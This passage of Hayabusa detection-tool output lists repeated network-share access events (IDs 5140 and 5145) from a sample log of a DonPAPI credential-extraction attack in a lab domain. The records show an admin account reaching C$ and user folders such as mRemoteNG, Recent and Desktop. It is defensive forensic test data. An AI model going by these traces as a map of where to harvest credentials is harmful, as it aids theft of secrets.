0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.150 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.181 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.202 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.218 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.234 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.249 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.265 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.268 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.270 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.271 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 